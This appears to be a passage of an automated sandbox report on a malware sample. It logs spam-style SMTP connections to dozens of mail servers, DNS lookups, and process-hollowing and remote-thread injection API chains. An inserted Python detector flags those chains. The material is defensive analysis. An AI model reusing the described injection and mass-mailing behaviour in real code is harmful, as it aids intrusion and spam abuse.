                      Source: unknownDNS traffic detected: query: out.shop-e-nfinite.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: 94c8b50eb70aa4c8.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.desomniac.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: audiomaster.es replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.web-schaaf.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.hotmy.fr replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.fluid.demon.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.lykiabotanika.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.servicioscorporativos.mx replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.fivefigureweeks.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.vermessungsseiten.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.credibo.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.lcampino.cl replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.bleisetzer.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.rockfiend.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.flt.khaitanpublicschool.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.viasu.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.lebcedars.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.capaci.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.cotamicro.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.heroofhealth.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.brpindustries.com.au replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.caledonian.ac.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.lollygaggeru.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.forfas.ie replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.mpost.co.nz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.2cr-h.fr replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.caistergolf.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.ivan-elkin.name replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.ghuitf.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.aumentarpenis.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.clubinternet.fr replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: hmajdal.tzafonet.org.il replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: secure.helanta.sh replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.anystars.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.marginalis.se replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.sohns-ruit.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.tamkinhochberg.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.ms-scorpio.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.emarki.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: eddwebs.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.apollosouth.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.rlmorgan.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.17hotmayil.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: hyacinthhouse.se replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.integrapost.cl replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.tecdev.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.sputtr.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.dynamicpayoff.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.sayclub.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.bpmconsultants.in replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.xnodfu.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.gemicomp.com.ar replaycode: Name error (3)
Source: unknown - Network traffic detected: DNS query count 373
Source: unknown - Network traffic detected: IP country count 23
Source: global traffic - DNS traffic detected: number of DNS queries: 373
Source: Joe Sandbox View - IP Address: 209.222.82.255
Source: Joe Sandbox View - IP Address: 13.248.169.48
Source: Joe Sandbox View - ASN Name: CASABLANCA-ASInternetCollocationProviderCZ
Source: Joe Sandbox View - ASN Name: VINAGAME-AS-VNVNGCorporationVN
                      Source: global trafficTCP traffic: 192.168.2.5:61693 -> 15.197.130.221:587
                      Source: global trafficTCP traffic: 192.168.2.5:61697 -> 72.52.179.174:587
                      Source: global trafficTCP traffic: 192.168.2.5:61699 -> 81.169.145.97:587
                      Source: global trafficTCP traffic: 192.168.2.5:61703 -> 138.100.200.12:587
                      Source: global trafficTCP traffic: 192.168.2.5:61704 -> 41.193.157.227:587
                      Source: global trafficTCP traffic: 192.168.2.5:61705 -> 149.106.174.170:587
                      Source: global trafficTCP traffic: 192.168.2.5:61706 -> 52.223.34.187:587
                      Source: global trafficTCP traffic: 192.168.2.5:61709 -> 47.43.18.10:587
                      Source: global trafficTCP traffic: 192.168.2.5:61712 -> 209.71.208.9:587
                      Source: global trafficTCP traffic: 192.168.2.5:61713 -> 169.61.124.242:587
                      Source: global trafficTCP traffic: 192.168.2.5:61721 -> 85.13.146.212:587
                      Source: global trafficTCP traffic: 192.168.2.5:61722 -> 13.57.89.168:587
                      Source: global trafficTCP traffic: 192.168.2.5:61728 -> 85.93.219.11:587
                      Source: global trafficTCP traffic: 192.168.2.5:61729 -> 52.101.10.14:587
                      Source: global trafficTCP traffic: 192.168.2.5:61734 -> 173.203.187.14:587
                      Source: global trafficTCP traffic: 192.168.2.5:61735 -> 178.250.10.199:587
                      Source: global trafficTCP traffic: 192.168.2.5:61737 -> 88.86.121.146:587
                      Source: global trafficTCP traffic: 192.168.2.5:61739 -> 93.104.207.155:587
                      Source: global trafficTCP traffic: 192.168.2.5:61743 -> 104.247.81.12:587
                      Source: global trafficTCP traffic: 192.168.2.5:61745 -> 64.190.63.222:587
                      Source: global trafficTCP traffic: 192.168.2.5:61747 -> 200.40.31.8:587
                      Source: global trafficTCP traffic: 192.168.2.5:61748 -> 162.215.97.1:587
                      Source: global trafficTCP traffic: 192.168.2.5:61750 -> 74.125.26.26:587
                      Source: global trafficTCP traffic: 192.168.2.5:61752 -> 13.251.65.157:587
                      Source: global trafficTCP traffic: 192.168.2.5:61755 -> 212.227.15.41:587
                      Source: global trafficTCP traffic: 192.168.2.5:61759 -> 191.6.216.99:587
                      Source: global trafficTCP traffic: 192.168.2.5:61762 -> 64.233.186.26:587
                      Source: global trafficTCP traffic: 192.168.2.5:61766 -> 2.207.150.234:587
                      Source: global trafficTCP traffic: 192.168.2.5:61768 -> 81.2.195.67:587
                      Source: global trafficTCP traffic: 192.168.2.5:61774 -> 5.175.14.63:587
                      Source: global trafficTCP traffic: 192.168.2.5:61778 -> 24.222.0.20:587
                      Source: global trafficTCP traffic: 192.168.2.5:61782 -> 62.169.183.1:587
                      Source: global trafficTCP traffic: 192.168.2.5:61783 -> 13.248.169.48:587
                      Source: global trafficTCP traffic: 192.168.2.5:61784 -> 35.201.134.121:587
                      Source: global trafficTCP traffic: 192.168.2.5:61786 -> 15.197.192.55:587
                      Source: global trafficTCP traffic: 192.168.2.5:61788 -> 89.161.204.64:587
                      Source: global trafficTCP traffic: 192.168.2.5:61789 -> 131.188.16.206:587
                      Source: global trafficTCP traffic: 192.168.2.5:61791 -> 81.169.145.84:587
                      Source: global trafficTCP traffic: 192.168.2.5:61792 -> 104.21.59.103:587
                      Source: global trafficTCP traffic: 192.168.2.5:61793 -> 45.119.84.172:587
                      Source: global trafficTCP traffic: 192.168.2.5:61797 -> 195.251.255.215:587
                      Source: global trafficTCP traffic: 192.168.2.5:61799 -> 154.70.144.136:587
                      Source: global trafficTCP traffic: 192.168.2.5:61802 -> 129.158.253.212:587
                      Source: global trafficTCP traffic: 192.168.2.5:61803 -> 216.113.192.36:587
                      Source: global trafficTCP traffic: 192.168.2.5:61805 -> 45.33.20.235:587
                      Source: global trafficTCP traffic: 192.168.2.5:61809 -> 62.121.128.11:587
                      Source: global trafficTCP traffic: 192.168.2.5:61812 -> 147.182.160.18:587
                      Source: global trafficTCP traffic: 192.168.2.5:61815 -> 64.59.128.135:587
                      Source: global trafficTCP traffic: 192.168.2.5:61816 -> 220.73.163.120:587
                      Source: global trafficTCP traffic: 192.168.2.5:61824 -> 200.42.138.135:587
                      Source: global trafficTCP traffic: 192.168.2.5:61828 -> 62.149.188.200:587
                      Source: global trafficTCP traffic: 192.168.2.5:61830 -> 84.116.6.19:587
                      Source: global trafficTCP traffic: 192.168.2.5:61831 -> 13.32.87.77:587
                      Source: global trafficTCP traffic: 192.168.2.5:61833 -> 109.72.89.197:587
                      Source: global trafficTCP traffic: 192.168.2.5:61834 -> 15.197.240.20:587
                      Source: global trafficTCP traffic: 192.168.2.5:61842 -> 79.96.164.169:587
                      Source: global trafficTCP traffic: 192.168.2.5:61845 -> 202.124.241.196:587
                      Source: global trafficTCP traffic: 192.168.2.5:61850 -> 77.78.119.119:587
                      Source: global trafficTCP traffic: 192.168.2.5:61851 -> 109.61.0.141:587
                      Source: global trafficTCP traffic: 192.168.2.5:61854 -> 103.224.212.215:587
                      Source: global trafficTCP traffic: 192.168.2.5:61855 -> 15.197.142.173:587
                      Source: global trafficTCP traffic: 192.168.2.5:61857 -> 91.121.56.64:587
                      Source: global trafficTCP traffic: 192.168.2.5:61858 -> 91.235.53.41:587
                      Source: global trafficTCP traffic: 192.168.2.5:61861 -> 178.210.170.80:587
                      Source: global trafficTCP traffic: 192.168.2.5:61862 -> 195.202.128.4:587
                      Source: global trafficTCP traffic: 192.168.2.5:61863 -> 75.2.24.159:587
                      Source: global trafficTCP traffic: 192.168.2.5:61864 -> 212.35.60.35:587
                      Source: global trafficTCP traffic: 192.168.2.5:61868 -> 203.134.71.82:587
                      Source: unknown; TCP traffic detected without corresponding DNS query: 212.162.153.199
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e; Code function: 6_2_00401015 connect,connect,WSAIoctl,select,recv,LocalFree,6_2_00401015
                      Source: lsass.exe, 00000009.00000002.3581324769.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328869509.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.
                      Source: lsass.exe, 00000009.00000000.2329224695.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2329003857.00000140AE09D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3591266818.00000140AE19E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.2525299614.00000140AE19D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                      Source: powershell.exe, 00000004.00000002.2328455416.000002638022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: svchost.exe, 00000013.00000000.2398720789.000001A204EE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: lsass.exe, 00000009.00000000.2328513124.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                      Source: lsass.exe, 00000009.00000000.2328513124.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2328455416.0000026380001000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: lsass.exe, 00000009.00000000.2328513124.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328540843.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3568613188.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                      Source: lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: lsass.exe, 00000009.00000000.2328513124.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                      Source: lsass.exe, 00000009.00000002.3567403959.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                      Source: powershell.exe, 00000004.00000002.2328455416.000002638022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: lsass.exe, 00000009.00000000.2329420813.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2329420813.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3593143472.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: svchost.exe, 0000001D.00000000.2428879469.000001E709ED9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msftconnecttest.com
                      Source: powershell.exe, 00000004.00000002.2328455416.0000026380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000004.00000002.2431183217.000002639006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000004.00000002.2431183217.000002639006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000004.00000002.2431183217.000002639006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: svchost.exe, 00000029.00000000.2501335133.00000181CF58B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3627240704.00000181CF58B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3630958265.00000181CF6A5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2499006036.00000181CEFA3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3608641216.00000181CEFA3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comSRD1%
                      Source: powershell.exe, 00000004.00000002.2328455416.000002638022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: powershell.exe, 00000004.00000002.2328455416.000002638114B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000004.00000002.2477130032.00000263FE117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micros2
                      Source: powershell.exe, 00000004.00000002.2431183217.000002639006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: svchost.exe, 00000029.00000000.2497725256.00000181CE673000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                      Source: svchost.exe, 00000029.00000002.3575637518.00000181CE673000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2497725256.00000181CE673000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com9
                      Source: svchost.exe, 00000029.00000002.3632977126.00000181CF754000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3575637518.00000181CE673000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2497725256.00000181CE673000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comSRD1-
                      Source: svchost.exe, 00000029.00000002.3632977126.00000181CF754000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comSRD13
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: svchost.exe, 00000029.00000002.3632977126.00000181CF754000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2501644507.00000181CF5EC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3628966949.00000181CF5EC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2499307462.00000181CEFD5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3612719143.00000181CEFD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comSRD1#

                      Spam, unwanted Advertisements and Ransom Demands

                      Source: SMTP Network traffic detected: Mail traffic on many different IPs 89

                      System Summary

                      Source: unknown Process created: Commandline size = 5545
                      Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848F20A4E NtUnmapViewOfSection
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848F20FF8 NtResumeThread
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848F20C6D NtWriteVirtualMemory
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848F20F30 NtSetContextThread
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,FindCloseChangeNotification,CloseHandle
                      Source: C:\Windows\System32\winlogon.exe Code function: 8_2_000001E858982950 NtEnumerateValueKey,NtEnumerateValueKey
                      Source: C:\Windows\System32\lsass.exe Code function: 9_2_00000140AE8620DC NtQuerySystemInformation,StrCmpNIW
                      Source: C:\Windows\System32\lsass.exe Code function: 9_2_00000140AE8625C4 NtQueryDirectoryFileEx,GetFileType,StrCpyW
                      Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
                      Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_hc0tk3g5.l1r.ps1
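The four powershell.exe rows above (NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread) are the classic process-hollowing primitives split across four functions, and the single dllhost.exe row is a complete remote-thread injection chain (OpenProcess, token SID inspection via OpenProcessToken/GetTokenInformation/GetSidSubAuthority, VirtualAllocEx, WriteProcessMemory, NtCreateThreadEx). The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses rows in this "Code function" format, groups the APIs per (process, pid) so that primitives spread over several functions are still seen together, and matches them against signature sets. The regex, the signature sets and the token-check heuristic are my own assumptions; the sample rows are copied from this section.

```python
"""Flag process-injection API chains in Joe Sandbox 'Code function' rows.

Added example, not part of the report. Each row names one function in a
process and the Win32/NT APIs it calls. Rows are grouped per (process, pid)
and the union of their APIs is matched against small signature sets.
"""
import re
from collections import defaultdict

# Sample rows taken from the System Summary section of this report. The raw
# export also fuses the source-column id onto the end of each row and drops
# the space before "Code function:"; ROW_RE accepts both forms.
ROWS = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848F20A4E NtUnmapViewOfSection",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848F20FF8 NtResumeThread",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848F20C6D NtWriteVirtualMemory",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848F20F30 NtSetContextThread",
    r"Source: C:\Windows\System32\dllhost.exe Code function: 7_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,FindCloseChangeNotification,CloseHandle",
    r"Source: C:\Windows\System32\winlogon.exe Code function: 8_2_000001E858982950 NtEnumerateValueKey,NtEnumerateValueKey",
    r"Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_01E520D0",
]

# <pid>_<round>_<addr>, addr is 8 hex digits (32-bit) or 16 (64-bit). The
# trailing duplicate id is optional so fused raw rows parse as well.
ROW_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?)\s*Code function:\s*"
    r"(?P<id>\d+_\d+_[0-9A-Fa-f]{8}(?:[0-9A-Fa-f]{8})?)"
    r"(?P<body>.*?)(?:(?P=id))?\s*$"
)

# Assumed minimal API sets: (all of these, at least one of these).
SIGNATURES = {
    "process hollowing": (
        {"NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"},
        set(),
    ),
    "remote thread injection": (
        {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"},
        {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread"},
    ),
}
# Reading a token SID sub-authority right after opening the target's token is
# how code usually reads the integrity level before picking a victim.
TOKEN_CHECK = {"OpenProcessToken", "GetTokenInformation", "GetSidSubAuthority"}


def parse_rows(rows):
    """Yield (process_path, pid, function_id, [api, ...]) for every row that parses."""
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        apis = [a for a in m.group("body").strip().split(",") if a]
        yield m.group("proc"), int(m.group("id").split("_")[0]), m.group("id"), apis


def apis_by_process(rows):
    """Union of the APIs named by all functions of one (process, pid)."""
    seen = defaultdict(set)
    for proc, pid, _fid, apis in parse_rows(rows):
        seen[(proc, pid)].update(apis)
    return seen


def classify(rows):
    """Return {(process_path, pid): [signature names]} for processes that match."""
    hits = {}
    for key, apis in apis_by_process(rows).items():
        names = [
            name for name, (need_all, need_any) in SIGNATURES.items()
            if need_all <= apis and (not need_any or need_any & apis)
        ]
        if names and TOKEN_CHECK <= apis:
            names.append("token SID inspected before injecting")
        if names:
            hits[key] = names
    return hits


if __name__ == "__main__":
    for (proc, pid), names in classify(ROWS).items():
        print(f"{proc} (pid {pid}): {', '.join(names)}")
```

Grouping per process is the point: none of the four powershell.exe functions is suspicious on its own, and a per-row rule would miss the hollowing entirely. The token check is only a hint appended to an existing injection match, because GetTokenInformation/GetSidSubAuthority also appear in plenty of benign code.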
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_01E520D0
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_01E50B50
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_01E50E28
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_01E5178D
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Code function: 0_2_01E52181
